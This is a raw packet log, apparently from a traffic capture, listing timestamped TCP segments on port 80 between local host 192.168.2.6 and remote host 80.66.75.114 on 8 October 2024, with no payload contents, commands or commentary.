                                                Oct 8, 2024 04:24:38.595374107 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595375061 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.595395088 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595395088 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.595416069 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595419884 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.595442057 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.595465899 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.595971107 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595982075 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.595992088 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.596002102 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.596012115 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.596019983 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.596035004 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.596065998 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712043047 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712058067 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712069035 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712142944 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712173939 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712251902 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712263107 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712272882 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712282896 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712294102 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712301016 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712305069 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712317944 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712331057 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712342978 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712373018 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712424994 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712436914 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712470055 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712496996 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712513924 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712524891 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712536097 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712541103 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712548018 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712564945 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712589025 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712748051 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712759972 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712769985 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712795973 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712811947 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712831974 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712842941 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712852955 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712865114 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712872028 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712887049 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712913036 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712925911 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712937117 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712948084 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712958097 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712968111 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712973118 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.712990999 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.712999105 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.713016987 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.713042974 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.713443995 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713455915 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713465929 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713493109 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.713510036 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.713601112 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713612080 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713622093 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713641882 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.713659048 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.713684082 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713696003 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713706017 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713717937 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713737011 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.713757992 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.713767052 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.713777065 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713787079 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713793039 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713799953 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713805914 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713874102 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.713942051 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713953018 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713963985 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713974953 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713985920 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.713989019 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.714011908 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.714025974 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.714545012 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.714562893 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.714574099 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.714586973 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.714601994 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.714618921 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.714634895 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.714646101 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.714657068 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.714668036 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.714678049 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.714703083 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.714723110 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.714735031 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.714745045 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.714767933 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.714783907 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.714837074 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.714848042 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.714857101 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.714869976 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.714879990 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.714879990 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.714891911 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.714903116 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.714905977 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.714932919 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.714947939 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.715517998 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.715528965 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.715539932 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.715569019 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.715591908 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.715595961 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.715606928 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.715617895 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.715629101 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.715641975 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.715667963 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.715745926 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.715755939 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.715765953 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.715775967 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.715786934 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.715790987 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.715799093 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.715810061 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.715816021 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.715821028 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.715833902 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.715835094 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.715845108 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.715857029 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.715884924 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.716456890 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.716466904 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.716478109 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.716501951 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.716521978 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.716530085 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.716532946 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.716546059 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.716557026 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.716562986 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.716581106 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.716609001 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.716609001 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.716622114 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.716631889 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.716643095 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.716655016 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.716660023 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.716671944 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.716682911 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.716687918 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.716711998 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.716726065 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.831027985 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.831043005 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.831053972 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.831083059 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.831114054 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.831131935 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.831151009 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.831161976 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.831171036 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.831171036 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.831188917 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.831196070 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.831202984 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.831212997 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.831222057 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.831224918 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.831243038 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.831243992 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.831255913 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.831267118 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.831270933 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.831278086 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.831280947 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.831307888 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.831325054 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.831326008 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.831347942 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.831358910 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.831362963 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.831381083 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.831399918 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.831419945 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.831451893 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.831458092 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.831486940 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.831501961 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.831513882 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:38.831547976 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.857721090 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:38.862528086 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204221010 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204231977 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204241991 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204253912 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204263926 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204273939 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204278946 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204308987 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.204365969 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.204365969 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.204370975 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204382896 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204396009 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204411983 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204413891 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.204421997 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204431057 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.204432964 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204443932 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204452991 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204457998 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.204463005 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204471111 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.204473972 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204484940 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204492092 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.204509020 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.204531908 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.204646111 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204657078 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204667091 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204685926 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.204704046 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.204752922 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204763889 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204772949 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204792976 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.204826117 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.204840899 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204850912 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204860926 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204876900 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204886913 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204888105 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.204899073 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204910040 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.204910994 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204930067 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.204952002 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.204955101 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204966068 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204976082 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.204997063 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.205018997 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.205135107 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.205144882 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.205154896 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.205179930 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.205197096 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.205210924 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.205220938 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.205229998 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.205238104 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.205246925 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.205246925 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.205276966 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.205292940 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.205380917 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.205390930 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.205399036 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.205410004 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.205418110 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.205420971 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.205427885 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.205429077 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.205437899 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.205447912 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.205450058 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.205459118 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.205468893 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.205473900 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.205478907 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.205486059 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.205513954 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.205538988 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.209602118 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.209613085 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.209623098 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.209686041 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.209686041 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.209700108 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.209709883 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.209718943 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.209724903 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.209729910 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.209734917 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.209738970 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.209795952 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.209811926 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.209822893 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.209832907 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.209842920 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.209851980 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.209851980 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.209863901 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.209873915 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.209875107 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.209883928 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.209898949 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.209907055 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.209924936 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.209935904 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.210094929 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210105896 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210117102 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210133076 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210135937 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.210143089 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210148096 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.210171938 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.210192919 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.210239887 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210251093 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210261106 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210269928 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210279942 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210289955 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210290909 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.210290909 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.210309982 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.210323095 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210333109 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.210334063 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210345984 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.210361958 CEST4973880192.168.2.680.66.75.114
